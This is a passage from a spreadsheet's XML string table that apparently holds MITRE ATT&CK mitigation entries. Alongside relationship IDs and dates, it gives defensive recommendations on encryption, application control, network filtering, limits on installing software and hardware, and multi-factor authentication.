    <t>Obfuscate/encrypt event files locally and in transit to avoid giving feedback to an adversary.</t>
  </si>
  <si>
    <t>relationship--cb1a3ef1-db77-4440-8277-62b1dd2f165d</t>
  </si>
  <si>
    <t>relationship--7bae5d92-dcc7-41c7-a116-58e9c9e84401</t>
  </si>
  <si>
    <t>Where possible, ensure that online traffic is appropriately encrypted through services such as trusted VPNs.</t>
  </si>
  <si>
    <t>relationship--055797c4-d3fe-4c7d-b921-ca3665f02f72</t>
  </si>
  <si>
    <t>Consider encrypting important information to reduce an adversary’s ability to perform tailored data modifications.</t>
  </si>
  <si>
    <t>relationship--51244880-c155-4dba-844a-2021304c8954</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</si>
  <si>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</si>
  <si>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relationship--55fa32b7-b9d2-4c57-9614-b7793b2770f2</t>
  </si>
  <si>
    <t>Configure SNMPv3 to use the highest level of security (authPriv) available.(Citation: US-CERT TA17-156A SNMP Abuse 2017)</t>
  </si>
  <si>
    <t>relationship--cee1cfd6-0906-4b52-a8b4-d0d585632b81</t>
  </si>
  <si>
    <t>Use of encryption provides an added layer of security to sensitive information sent over email. Encryption using public key cryptography requires the adversary to obtain the private certificate along with an encryption key to decrypt messages.</t>
  </si>
  <si>
    <t>relationship--c15c9cbf-7ecc-4e2b-8fe1-636f381bac63</t>
  </si>
  <si>
    <t>relationship--9e134214-4cb2-438b-9306-22e7d1ea80fe</t>
  </si>
  <si>
    <t>relationship--185c194a-5823-46e4-9719-9de48c3c1734</t>
  </si>
  <si>
    <t>relationship--c2bc4c63-486f-4c92-9eaa-ece8226ec70c</t>
  </si>
  <si>
    <t>relationship--f5d32cc0-dc9e-4ff4-8af2-b131c303a1a1</t>
  </si>
  <si>
    <t>Ensure Domain Controller backups are properly secured.(Citation: Metcalf 2015)</t>
  </si>
  <si>
    <t>relationship--e6b41083-5390-452d-991c-de86befbe6e1</t>
  </si>
  <si>
    <t xml:space="preserve">Configure SNMPv3 to use the highest level of security (authPriv) available.(Citation: US-CERT TA17-156A SNMP Abuse 2017) </t>
  </si>
  <si>
    <t>relationship--38762462-11f6-4f44-bda3-4da3c2c8d70d</t>
  </si>
  <si>
    <t>relationship--70d446a5-349f-4b70-9446-90e872adac42</t>
  </si>
  <si>
    <t>Ensure Domain Controller backups are properly secured.</t>
  </si>
  <si>
    <t>relationship--3e3f06c4-3105-4d07-b876-702005e9b59a</t>
  </si>
  <si>
    <t>When possible, store keys on separate cryptographic hardware instead of on the local system. For example, on Windows systems use a TPM to secure keys and other sensitive credential material.(Citation: Microsoft Primary Refresh Token)</t>
  </si>
  <si>
    <t>relationship--ee382a02-cde0-49a8-89e2-26237a25740c</t>
  </si>
  <si>
    <t>relationship--8178dba2-1469-4322-af59-f6935152deb0</t>
  </si>
  <si>
    <t>relationship--86c58566-41e5-452f-b649-b481bfbd1202</t>
  </si>
  <si>
    <t>relationship--fe445c04-05c2-4370-b00c-3821dac9c1ae</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</si>
  <si>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</si>
  <si>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relationship--98b6508c-5f00-4c06-a906-4fd7ce74bc62</t>
  </si>
  <si>
    <t>relationship--5574a01e-efcc-49d6-8692-30c97c611397</t>
  </si>
  <si>
    <t>relationship--a665756c-06f8-44a2-b6e6-5143d1d59400</t>
  </si>
  <si>
    <t>relationship--ca433ac6-fb5a-41bc-969b-4721571fe836</t>
  </si>
  <si>
    <t>Encrypt all important data flows to reduce the impact of tailored modifications on data in transit.</t>
  </si>
  <si>
    <t>relationship--4ba4eefd-1387-4eee-9c6d-aa2ba19faf9c</t>
  </si>
  <si>
    <t xml:space="preserve">When possible, store keys on separate cryptographic hardware instead of on the local system. </t>
  </si>
  <si>
    <t>relationship--069ff8f0-889c-4463-bf5d-618bf5e457ee</t>
  </si>
  <si>
    <t>M1039</t>
  </si>
  <si>
    <t>Environment Variable Permissions</t>
  </si>
  <si>
    <t>course-of-action--609191bf-7d06-40e4-b1f8-9e11eb3ff8a6</t>
  </si>
  <si>
    <t>Making the environment variables associated with command history read only may ensure that the history is preserved.(Citation: Securing bash history)</t>
  </si>
  <si>
    <t>relationship--dcc531dd-6136-44ac-963b-3ebab0028d96</t>
  </si>
  <si>
    <t>Prevent users from changing the &lt;code&gt;HISTCONTROL&lt;/code&gt;, &lt;code&gt;HISTFILE&lt;/code&gt;, and &lt;code&gt;HISTFILESIZE&lt;/code&gt; environment variables. (Citation: Securing bash history)</t>
  </si>
  <si>
    <t>relationship--dbb28d6a-0007-467a-ae7a-bf09eddd436c</t>
  </si>
  <si>
    <t>M1038</t>
  </si>
  <si>
    <t>Execution Prevention</t>
  </si>
  <si>
    <t>course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db</t>
  </si>
  <si>
    <t>System settings can prevent applications from running that haven't been downloaded from legitimate repositories which may help mitigate some of these issues. Not allowing unsigned applications from being run may also mitigate some risk.</t>
  </si>
  <si>
    <t>relationship--35428082-1010-4e0e-ac4c-9f1426de7796</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</si>
  <si>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</si>
  <si>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relationship--ccec5b80-e16a-4379-926f-08c1c821497a</t>
  </si>
  <si>
    <t>23 August 2021</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</si>
  <si>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</si>
  <si>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relationship--db8a5d74-11f0-4773-aae8-43a0a6f85f61</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</si>
  <si>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</si>
  <si>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relationship--65fa218e-b442-41ca-8fed-bccdb5523656</t>
  </si>
  <si>
    <t>28 February 2022</t>
  </si>
  <si>
    <t>Use application control where appropriate.</t>
  </si>
  <si>
    <t>relationship--809f6537-c7f8-4d96-ba16-5bffa897b52f</t>
  </si>
  <si>
    <t>Set a browser extension allow or deny list as appropriate for your security policy. (Citation: Technospot Chrome Extensions GP)</t>
  </si>
  <si>
    <t>relationship--e13f1e41-fc5c-4cd3-ad6b-62bc597c959a</t>
  </si>
  <si>
    <t>Consider using application control configured to block execution of CMSTP.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>relationship--e7f93370-0bfc-417c-8811-627ab39fafca</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</si>
  <si>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</si>
  <si>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relationship--caf19942-8346-447f-9781-28a0b858c43f</t>
  </si>
  <si>
    <t>30 August 2021</t>
  </si>
  <si>
    <t>Use application control where appropriate to block use of PowerShell CmdLets or other host based resources to access cloud API resources.</t>
  </si>
  <si>
    <t>relationship--b42d990f-4fa7-40be-9018-73c75130fcfe</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</si>
  <si>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</si>
  <si>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relationship--87fd0088-41da-47ac-bd69-a8ac151a0d39</t>
  </si>
  <si>
    <t>27 March 2023</t>
  </si>
  <si>
    <t>Consider using application control to prevent execution of hh.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>relationship--f4702ee6-c04f-4ccb-95f3-1b40cf6c69c8</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</si>
  <si>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</si>
  <si>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relationship--fd9cf3cc-51cd-4f13-b90e-2b8e274a4cc1</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</si>
  <si>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</si>
  <si>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relationship--98d0fca0-b3e7-4f69-b5f3-527cdd4f48c9</t>
  </si>
  <si>
    <t>Adversaries may use new DLLs to execute this technique. Identify and block potentially malicious software executed through search order hijacking by using application control solutions capable of blocking DLLs loaded by legitimate software.</t>
  </si>
  <si>
    <t>relationship--22ce2c93-ecd6-4627-b3f0-6f7476754c79</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</si>
  <si>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</si>
  <si>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relationship--7734ffaf-1cd2-40ca-8c0d-9cfd95e8d1ec</t>
  </si>
  <si>
    <t>Adversaries may use new payloads to execute this technique. Identify and block potentially malicious software executed through hijacking by using application control solutions also capable of blocking libraries loaded by legitimate software.</t>
  </si>
  <si>
    <t>relationship--0fc95a6b-296f-41ab-8663-aea4a80afe0a</t>
  </si>
  <si>
    <t>System settings can prevent applications from running that haven't been downloaded through the Apple Store which may help mitigate some of these issues. Not allowing unsigned applications from being run may also mitigate some risk.</t>
  </si>
  <si>
    <t>relationship--362b2f10-f599-4663-9cff-27932e11935a</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</si>
  <si>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</si>
  <si>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relationship--365897c8-a97b-42e0-8fb8-cc08c23545df</t>
  </si>
  <si>
    <t>Consider blocking the execution of known vulnerable drivers that adversaries may exploit to execute code in kernel mode. Validate driver block rules in audit mode to ensure stability prior to production deployment.(Citation: Microsoft Driver Block Rules)</t>
  </si>
  <si>
    <t>relationship--dd9a12ee-30b1-4764-860d-111c73411ebe</t>
  </si>
  <si>
    <t xml:space="preserve">System settings can prevent applications from running that haven't been downloaded through the Apple Store which can help mitigate some of these issues. </t>
  </si>
  <si>
    <t>relationship--819bc603-b0fe-4681-a235-3c6e9a36e3b5</t>
  </si>
  <si>
    <t>Limit or restrict program execution using anti-virus software. On MacOS, allowlist programs that are allowed to have the plist tag. All other programs should be considered suspicious.</t>
  </si>
  <si>
    <t>relationship--1279ae2b-fb00-4980-a5cc-9a802ad2901d</t>
  </si>
  <si>
    <t>15 March 2022</t>
  </si>
  <si>
    <t>relationship--6fa01dcb-e06c-4f8b-b6a2-c301f0198df4</t>
  </si>
  <si>
    <t>Restrict unallowed ISAPI extensions and filters from running by specifying a list of ISAPI extensions and filters that can run on IIS.(Citation: Microsoft ISAPICGIRestriction 2016)</t>
  </si>
  <si>
    <t>relationship--7742d5c6-6987-4a87-92e9-c213880d911a</t>
  </si>
  <si>
    <t>relationship--952ec6aa-f5dd-494d-91ea-b3804b843c35</t>
  </si>
  <si>
    <t>Use application control configured to block execution of InstallUtil.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>relationship--21ce896b-e6b5-4075-8d97-6b59c269247c</t>
  </si>
  <si>
    <t>Denylist scripting where appropriate.</t>
  </si>
  <si>
    <t>relationship--5853af0d-4716-4290-b3d9-63fadfd5f554</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</si>
  <si>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</si>
  <si>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relationship--b783f90e-bd7c-4513-b15a-731637d7078d</t>
  </si>
  <si>
    <t>Allow applications via known hashes.</t>
  </si>
  <si>
    <t>relationship--ab27d3af-d454-4a4c-801b-ea9a6c0d4b47</t>
  </si>
  <si>
    <t>Use application control configured to block execution of MMC if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>relationship--ed2229d5-d586-4986-b3ae-e5f788bb6e15</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</si>
  <si>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</si>
  <si>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relationship--c755a235-d278-41ed-835c-48e831b6d1a5</t>
  </si>
  <si>
    <t>Application control may be able to prevent the running of executables masquerading as other files.</t>
  </si>
  <si>
    <t>relationship--60e4698b-a16d-4a40-8473-4d88e2e70881</t>
  </si>
  <si>
    <t>Consider blocking container file types at web and/or email gateways. Consider unregistering container file extensions in Windows File Explorer.(Citation: Dormann Dangers of VHD 2019)</t>
  </si>
  <si>
    <t>relationship--e6dd2026-0c65-4a42-a306-d525bb442ab3</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</si>
  <si>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</si>
  <si>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relationship--84185ab0-a7f3-4629-b553-dc6e24b0ed14</t>
  </si>
  <si>
    <t>Use tools that restrict program execution via application control by attributes other than file name for common operating system utilities that are needed.</t>
  </si>
  <si>
    <t>relationship--eb5ade8c-73e9-4b69-9dea-c8a8206dec25</t>
  </si>
  <si>
    <t>relationship--095e5f7b-288c-4995-8045-b691602d38c9</t>
  </si>
  <si>
    <t>Use application control configured to block execution of mavinject.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>relationship--f48b4601-28de-42d1-9ce6-84ad4608acba</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</si>
  <si>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</si>
  <si>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relationship--1837a0e7-d8aa-4c96-8213-7d08ceb86390</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</si>
  <si>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</si>
  <si>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relationship--42f4db8f-ef8b-4dcc-8c8f-4d0b5219c8b7</t>
  </si>
  <si>
    <t>TACACS+ can keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization. (Citation: Cisco IOS Software Integrity Assurance - TACACS)</t>
  </si>
  <si>
    <t>relationship--950d7968-6a24-44aa-8a17-4a9c5cb64f96</t>
  </si>
  <si>
    <t>Use application control configured to block execution of Odbcconf.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>relationship--8541e1a0-0cd5-44fc-bc88-c96b474bcaeb</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</si>
  <si>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</si>
  <si>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relationship--895ef30f-0b60-473e-829f-6c6d2aab5ab0</t>
  </si>
  <si>
    <t>relationship--0f955c85-17f5-46cf-bf5c-eece3b6c08ca</t>
  </si>
  <si>
    <t>relationship--b7a27a94-f036-4a0b-a96c-aa7bb1c7311f</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</si>
  <si>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</si>
  <si>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relationship--fe42b5e6-06dd-4b08-8ef8-31323f8190d2</t>
  </si>
  <si>
    <t>28 May 2021</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</si>
  <si>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</si>
  <si>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relationship--387cdc83-fc81-499e-8875-e3d4789af9c3</t>
  </si>
  <si>
    <t>Denylist Python where not required.</t>
  </si>
  <si>
    <t>relationship--b7f73589-4640-468d-8422-04cfc7e7e110</t>
  </si>
  <si>
    <t>Block execution of Regsvcs.exe and Regasm.exe if they are not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>relationship--2d712b2d-a9a6-4efd-b37e-1219768bdde7</t>
  </si>
  <si>
    <t>Use application control to mitigate installation and use of unapproved software that can be used for remote access.</t>
  </si>
  <si>
    <t>relationship--54306888-1f93-4461-bcac-a56ae7073b31</t>
  </si>
  <si>
    <t>Use application control to mitigate installation and use of unapproved virtualization software.</t>
  </si>
  <si>
    <t>relationship--f9deebbf-5710-4e54-b4be-83404cee35da</t>
  </si>
  <si>
    <t>Enable application control solutions such as AppLocker and/or Device Guard to block the loading of malicious SIP DLLs.</t>
  </si>
  <si>
    <t>relationship--08dd36a7-dee0-4f25-b3dc-d030c32151f5</t>
  </si>
  <si>
    <t>Block .scr files from being executed from non-standard locations.</t>
  </si>
  <si>
    <t>relationship--1174923e-8d3e-4932-9121-8f5fb7089c1e</t>
  </si>
  <si>
    <t>Identify and block potentially malicious software executed through this technique by using application control tools capable of preventing unknown modules from being loaded.</t>
  </si>
  <si>
    <t>relationship--2c89cab1-efbb-405c-930d-197ae1910e5b</t>
  </si>
  <si>
    <t>Use application controls to mitigate installation and use of payloads that may be utilized to spoof security alerting.</t>
  </si>
  <si>
    <t>relationship--542decaf-826e-41b4-bf66-3ef376767928</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</si>
  <si>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</si>
  <si>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relationship--15b9b22e-7896-4219-8ec9-59b099644a6f</t>
  </si>
  <si>
    <t>Consider using application control to prevent execution of binaries that are susceptible to abuse and not required for a given system or network.</t>
  </si>
  <si>
    <t>relationship--95e4e360-b867-48b4-a494-d9d148232b70</t>
  </si>
  <si>
    <t>relationship--54d2ea67-40fd-4fbc-b76a-01879aa5bff5</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</si>
  <si>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</si>
  <si>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relationship--b0831323-de94-498a-8338-c60778bef95f</t>
  </si>
  <si>
    <t>Certain developer utilities should be blocked or restricted if not required.</t>
  </si>
  <si>
    <t>relationship--8c0286e0-036d-4282-9e54-6938c958b7e9</t>
  </si>
  <si>
    <t>relationship--6f5aaa40-a294-4b8f-8bd3-0f34ce8a0612</t>
  </si>
  <si>
    <t>relationship--225ab1b4-f800-4a92-9949-a0f05fce6213</t>
  </si>
  <si>
    <t>Use application control configured to block execution of verclsid.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>relationship--423ba5d2-6400-4e35-ba8e-dfbedd0b5303</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</si>
  <si>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</si>
  <si>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relationship--1a69dce6-b39e-4cd2-a29a-18e42293c51a</t>
  </si>
  <si>
    <t>relationship--aa103bc8-1753-4b41-bf5c-a9dc0b9a2986</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</si>
  <si>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</si>
  <si>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relationship--55670baa-97b1-44fe-abb8-0162b5a9663b</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</si>
  <si>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</si>
  <si>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relationship--796ea220-2948-461b-9948-4290eec8dbf6</t>
  </si>
  <si>
    <t>If msxsl.exe is unnecessary, then block its execution to prevent abuse by adversaries.</t>
  </si>
  <si>
    <t>relationship--af393cd2-2a5a-41f8-a1b1-218f30beb4dd</t>
  </si>
  <si>
    <t>M1050</t>
  </si>
  <si>
    <t>Exploit Protection</t>
  </si>
  <si>
    <t>course-of-action--d2a24649-9694-4c97-9c62-ce7b270bf6a3</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</si>
  <si>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</si>
  <si>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relationship--1e6c88fb-11fc-481d-990a-81d74a69e02f</t>
  </si>
  <si>
    <t>Web Application Firewalls may be used to limit exposure of applications to prevent exploit traffic from reaching the application.</t>
  </si>
  <si>
    <t>relationship--53a95297-1cce-401c-99a3-34079e878fac</t>
  </si>
  <si>
    <t>relationship--3d1c88d6-f390-4e05-ba1c-c6ea59f5fe22</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</si>
  <si>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</si>
  <si>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relationship--16749b64-2091-43d5-a76f-d6f8f98c5bf4</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</si>
  <si>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</si>
  <si>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relationship--355eb66e-dc0a-44d4-b31d-3dbe7570a0d2</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</si>
  <si>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</si>
  <si>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relationship--267fa35c-7748-40eb-87ba-bddc0c88d643</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</si>
  <si>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</si>
  <si>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relationship--2627d84f-081d-4b14-9d7d-5a1ca77d5869</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</si>
  <si>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</si>
  <si>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relationship--b0da6a37-0a54-438f-abeb-7f1dcfebaa45</t>
  </si>
  <si>
    <t>Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass application control.</t>
  </si>
  <si>
    <t>relationship--9c7faf9b-c0ee-419f-b816-777edebd3a2a</t>
  </si>
  <si>
    <t>Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using using trusted binaries to bypass application control.</t>
  </si>
  <si>
    <t>relationship--1f1de0ea-581b-4b41-953f-1b8f552f84e7</t>
  </si>
  <si>
    <t>Use utilities that detect or mitigate common features used in exploitation, such as the Microsoft Enhanced Mitigation Experience Toolkit (EMET).</t>
  </si>
  <si>
    <t>relationship--f66af3ae-266c-4aa1-a6b4-f1ff87aff601</t>
  </si>
  <si>
    <t>M1037</t>
  </si>
  <si>
    <t>Filter Network Traffic</t>
  </si>
  <si>
    <t>course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d</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</si>
  <si>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</si>
  <si>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relationship--cea07509-b84d-4b25-b9e8-758a8e66b3f1</t>
  </si>
  <si>
    <t>Use network appliances and host-based security software to block network traffic that is not necessary within the environment, such as legacy protocols that may be leveraged for AiTM conditions.</t>
  </si>
  <si>
    <t>relationship--029a477b-fa90-4941-a577-1af6900d1b56</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</si>
  <si>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</si>
  <si>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relationship--18aa9fc3-5269-4205-a58e-6aeb127c38f4</t>
  </si>
  <si>
    <t>relationship--69db7ce6-c72e-4710-9e32-48b0a6ca7675</t>
  </si>
  <si>
    <t>Modify network and/or host firewall rules, as well as other network controls, to only allow legitimate BITS traffic.</t>
  </si>
  <si>
    <t>relationship--4b4d8f9e-a416-4af6-9c20-582892601668</t>
  </si>
  <si>
    <t>13 April 2021</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</si>
  <si>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</si>
  <si>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relationship--fce13b14-c974-4de2-9dfb-7ad45bca85f0</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</si>
  <si>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</si>
  <si>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relationship--265401e7-92fa-46ea-b5d3-e64c387f6a8d</t>
  </si>
  <si>
    <t xml:space="preserve">Consider filtering DNS requests to unknown, untrusted, or known bad domains and resources. Resolving DNS requests with on-premise/proxy servers may also disrupt adversary attempts to conceal data within DNS packets. </t>
  </si>
  <si>
    <t>relationship--444dc2e9-3f54-4ab9-b004-363ae1221373</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</si>
  <si>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</si>
  <si>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relationship--cf63b75f-564f-4713-a5b3-1f102d098e8e</t>
  </si>
  <si>
    <t>17 October 2019</t>
  </si>
  <si>
    <t>Apply extended ACLs to block unauthorized protocols outside the trusted network.(Citation: US-CERT TA17-156A SNMP Abuse 2017)</t>
  </si>
  <si>
    <t>relationship--a78cac98-60e1-406a-8486-fcaf04a644e3</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</si>
  <si>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</si>
  <si>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relationship--92f524c5-86e8-43cf-90d5-907ac16acf5d</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</si>
  <si>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</si>
  <si>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relationship--5d37f644-31c5-414e-9a83-cb6fb36b87e0</t>
  </si>
  <si>
    <t>14 April 2021</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</si>
  <si>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</si>
  <si>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relationship--6eec2d79-1d59-459d-af33-b186ece9748b</t>
  </si>
  <si>
    <t xml:space="preserve">Enforce proxies and use dedicated servers for services such as DNS and only allow those systems to communicate over respective ports/protocols, instead of all systems within a network. </t>
  </si>
  <si>
    <t>relationship--d65b3176-37a7-4072-90b8-38ac51dbe44d</t>
  </si>
  <si>
    <t>relationship--4c8d1c47-d1a1-4117-8ba5-39296d8afe4d</t>
  </si>
  <si>
    <t>relationship--9c4621d7-76b4-4af5-838e-391236f521d2</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</si>
  <si>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</si>
  <si>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relationship--85c9285a-6738-42dd-aa12-fbded3e7bbdb</t>
  </si>
  <si>
    <t>Use host-based security software to block LLMNR/NetBIOS traffic. Enabling SMB Signing can stop NTLMv2 relay attacks.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)(Citation: Microsoft SMB Packet Signing)</t>
  </si>
  <si>
    <t>relationship--f22a84ea-e4da-4a2c-8035-3eb972365bd3</t>
  </si>
  <si>
    <t>Consider using the host firewall to restrict file sharing communications such as SMB. (Citation: Microsoft Preventing SMB)</t>
  </si>
  <si>
    <t>relationship--6485bfc6-53b5-43c1-9c52-6a35c3fc630d</t>
  </si>
  <si>
    <t>01 June 2020</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</si>
  <si>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</si>
  <si>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relationship--4735a1be-c556-4844-9554-d2313376f09a</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</si>
  <si>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</si>
  <si>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relationship--f03e2a94-27c6-470f-9f87-7cac3c6845af</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</si>
  <si>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</si>
  <si>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relationship--ac04879c-2316-4c3c-86e4-8fac1e80fb49</t>
  </si>
  <si>
    <t>relationship--52fcde3f-d3af-4785-940f-5856dd657455</t>
  </si>
  <si>
    <t>relationship--940764df-0039-40fa-a3c7-ce064ceed4ea</t>
  </si>
  <si>
    <t>Filter network traffic to prevent use of protocols across the network boundary that are unnecessary.</t>
  </si>
  <si>
    <t>relationship--9acd9add-9b08-45dd-8135-98e62eb708e2</t>
  </si>
  <si>
    <t>relationship--a429ab16-3153-4753-b4db-4311b09811fd</t>
  </si>
  <si>
    <t>Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.</t>
  </si>
  <si>
    <t>relationship--0058d5dd-bf42-4a09-94ff-dfb024b949df</t>
  </si>
  <si>
    <t xml:space="preserve">Consider filtering network traffic to untrusted or known bad domains and resources. </t>
  </si>
  <si>
    <t>relationship--0927eb00-4a08-4ed1-8678-84d6e1e87b98</t>
  </si>
  <si>
    <t>relationship--a424a85c-a3c6-4d84-85f7-e55c8dbe21fc</t>
  </si>
  <si>
    <t>relationship--2f47b6cb-a378-492d-9565-e9ebbca68908</t>
  </si>
  <si>
    <t>Properly configure firewalls, application firewalls, and proxies to limit outgoing traffic to sites and services used by remote access software.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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relationship--4b5e8e16-ddf4-4339-859b-f70f980d612b</t>
  </si>
  <si>
    <t>Implement network-based filtering restrictions to prohibit data transfers to untrusted VPCs.</t>
  </si>
  <si>
    <t>relationship--a5b61b67-8d99-4bc5-86d0-00739f0be666</t>
  </si>
  <si>
    <t>11 October 2019</t>
  </si>
  <si>
    <t>relationship--6607178e-a8b4-4da9-b985-3712eb71a303</t>
  </si>
  <si>
    <t>VNC defaults to TCP ports 5900 for the server, 5800 for browser access, and 5500 for a viewer in listening mode. Filtering or blocking these ports will inhibit VNC traffic utilizing default ports.</t>
  </si>
  <si>
    <t>relationship--4f05951e-e480-4ffc-b573-3a7aa3fc4b7c</t>
  </si>
  <si>
    <t>Consider modifying host firewall rules to prevent egress traffic from verclsid.exe.</t>
  </si>
  <si>
    <t>relationship--54add4d1-ab65-451e-b3ab-2c045261b082</t>
  </si>
  <si>
    <t>M1035</t>
  </si>
  <si>
    <t>Limit Access to Resource Over Network</t>
  </si>
  <si>
    <t>course-of-action--1dcaeb21-9348-42ea-950a-f842aaf1ae1f</t>
  </si>
  <si>
    <t>Create static ARP entries for networked devices. Implementing static ARP entries may be infeasible for large networks.</t>
  </si>
  <si>
    <t>relationship--c44ff9d1-8718-49d7-9054-f7c89a221c93</t>
  </si>
  <si>
    <t>If possible, use a Remote Desktop Gateway to manage connections and security configuration of RDP within a network.(Citation: TechNet RDP Gateway)</t>
  </si>
  <si>
    <t>relationship--c7e86d53-378b-4cb5-8d86-2b7b5f4c1232</t>
  </si>
  <si>
    <t>28 April 2020</t>
  </si>
  <si>
    <t>Limit access to network infrastructure and resources that can be used to reshape traffic or otherwise produce AiTM conditions.</t>
  </si>
  <si>
    <t>relationship--0f9283d3-3b13-47ca-9757-7a7739738356</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</si>
  <si>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</si>
  <si>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relationship--1720444b-e442-423e-ba6f-48079ad8b04e</t>
  </si>
  <si>
    <t>Limit access to the Instance Metadata API using a host-based firewall such as iptables.</t>
  </si>
  <si>
    <t>relationship--14585131-d378-4589-80b2-3c6ed88cba23</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</si>
  <si>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</si>
  <si>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relationship--9d62760d-5678-4ebf-9a19-aa9de5d9728c</t>
  </si>
  <si>
    <t>relationship--d8b7535e-7cf7-408e-acd3-a42fc77a5e35</t>
  </si>
  <si>
    <t>relationship--b3e90252-cb18-4cd3-8faf-59d25a39bb46</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</si>
  <si>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</si>
  <si>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relationship--9e87accb-6851-4438-8673-e3682dae807f</t>
  </si>
  <si>
    <t>Limit access to remote services through centrally managed concentrators such as VPNs and other managed remote access systems.</t>
  </si>
  <si>
    <t>relationship--9eaaffb7-4dc4-4aac-a1d5-675b71e587df</t>
  </si>
  <si>
    <t>Establish network access control policies, such as using device certificates and the 802.1x standard. (Citation: Wikipedia 802.1x) Restrict use of DHCP to registered devices to prevent unregistered devices from communicating with trusted systems.</t>
  </si>
  <si>
    <t>relationship--64af911e-0b75-45b5-903d-b1ab4676556f</t>
  </si>
  <si>
    <t>Use remote desktop gateways.</t>
  </si>
  <si>
    <t>relationship--10be521b-285c-4ce7-a4ec-837b63a0f666</t>
  </si>
  <si>
    <t>relationship--375d3b8b-0e1b-4d3b-b31f-43b0e98436a5</t>
  </si>
  <si>
    <t>Consider disabling Windows administrative shares.</t>
  </si>
  <si>
    <t>relationship--afe166b7-d849-4635-8e85-65b9d0bf11c5</t>
  </si>
  <si>
    <t>20 May 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Restrict use of protocols without encryption or authentication mechanisms. Limit access to administrative and management interfaces from untrusted network sources. </t>
  </si>
  <si>
    <t>relationship--8dec7181-81a7-4f77-8b83-81e93cf09f10</t>
  </si>
  <si>
    <t>Limit network access to sensitive services, such as the Instance Metadata API.</t>
  </si>
  <si>
    <t>relationship--aa206b5b-9ea2-4f68-a4a0-4060e760c2cd</t>
  </si>
  <si>
    <t>M1034</t>
  </si>
  <si>
    <t>Limit Hardware Installation</t>
  </si>
  <si>
    <t>course-of-action--2995bc22-2851-4345-ad19-4e7e295be264</t>
  </si>
  <si>
    <t>Limit the use of USB devices and removable media within a network.</t>
  </si>
  <si>
    <t>relationship--b957c285-b036-455d-a14f-8705838fd874</t>
  </si>
  <si>
    <t>relationship--b2b112f8-27ed-449c-a9e1-e984139ee9f2</t>
  </si>
  <si>
    <t>Block unknown devices and accessories by endpoint security configuration and monitoring agent.</t>
  </si>
  <si>
    <t>relationship--b28f8635-6a79-4be1-b05a-b4356a04e7c2</t>
  </si>
  <si>
    <t>relationship--5c245d0b-61e7-4558-8b36-32c846266af0</t>
  </si>
  <si>
    <t>M1033</t>
  </si>
  <si>
    <t>Limit Software Installation</t>
  </si>
  <si>
    <t>course-of-action--23843cff-f7b9-4659-a7b7-713ef347f547</t>
  </si>
  <si>
    <t>Only install browser extensions from trusted sources that can be verified. Browser extensions for some browsers can be controlled through Group Policy. Change settings to prevent the browser from installing extensions without sufficient permissions.</t>
  </si>
  <si>
    <t>relationship--08dea09a-e7f5-4e6d-a142-73548f6f1498</t>
  </si>
  <si>
    <t>Restrict software installation to trusted repositories only and be cautious of orphaned software packages.</t>
  </si>
  <si>
    <t>relationship--43d69d89-df36-44fa-a09e-c66aa9fa5918</t>
  </si>
  <si>
    <t>Prevent users from installing Python where not required.</t>
  </si>
  <si>
    <t>relationship--9e0a19f8-e970-49a1-9952-ae7380247ace</t>
  </si>
  <si>
    <t xml:space="preserve">Restrict the use of third-party software suites installed within an enterprise network. </t>
  </si>
  <si>
    <t>relationship--87cf80be-bae1-4a12-a754-38cad36724ac</t>
  </si>
  <si>
    <t>relationship--ebb9afc6-dbe3-4049-8f33-a782f15eca79</t>
  </si>
  <si>
    <t>09 October 2020</t>
  </si>
  <si>
    <t>Restrict software installation to user groups that require it. A VNC server must be manually installed by the user or adversary.</t>
  </si>
  <si>
    <t>relationship--f5d1e0f1-0e96-41dc-86a4-79307310a001</t>
  </si>
  <si>
    <t>relationship--8a67fe7a-4eb0-4dc8-bdd9-810eb05d8157</t>
  </si>
  <si>
    <t>18 September 2019</t>
  </si>
  <si>
    <t>10 November 2020</t>
  </si>
  <si>
    <t>M1032</t>
  </si>
  <si>
    <t>Multi-factor Authentication</t>
  </si>
  <si>
    <t>course-of-action--b045d015-6bed-4490-bd38-56b41ece59a0</t>
  </si>
  <si>
    <t>Use multi-factor authentication for user and privileged accounts.</t>
  </si>
  <si>
    <t>relationship--74e433ec-0c52-42f2-b0d4-3e1f3a56b419</t>
  </si>
  <si>
    <t>Use multi-factor authentication for user and privileged accounts. Consider enforcing multi-factor authentication for the &lt;code&gt;CreateKeyPair&lt;/code&gt; and &lt;code&gt;ImportKeyPair&lt;/code&gt; API calls through IAM policies.(Citation: Expel IO Evil in AWS)</t>
  </si>
  <si>
    <t>relationship--04f19ae7-931f-4798-a609-4b64aced1da3</t>
  </si>
  <si>
    <t>relationship--7dfb4403-9368-4fed-aac0-a968e7761c4a</t>
  </si>
  <si>
    <t xml:space="preserve">Require multi-factor authentication for user accounts integrated into container clusters through cloud deployments or via authentication protocols such as LDAP or SAML. </t>
  </si>
  <si>
    <t>relationship--af3fe271-9d63-447d-bd88-f5f0b41a43c2</t>
  </si>
  <si>
    <t>relationship--e65ad45a-4862-4455-8d3c-454eb78deaeb</t>
  </si>
  <si>
    <t>Use multi-factor authentication. Where possible, also enable multi-factor authentication on externally facing services.</t>
  </si>
  <si>
    <t>relationship--cb87a0ce-0976-49e5-8e9c-2c908a24b30f</t>
  </si>
  <si>
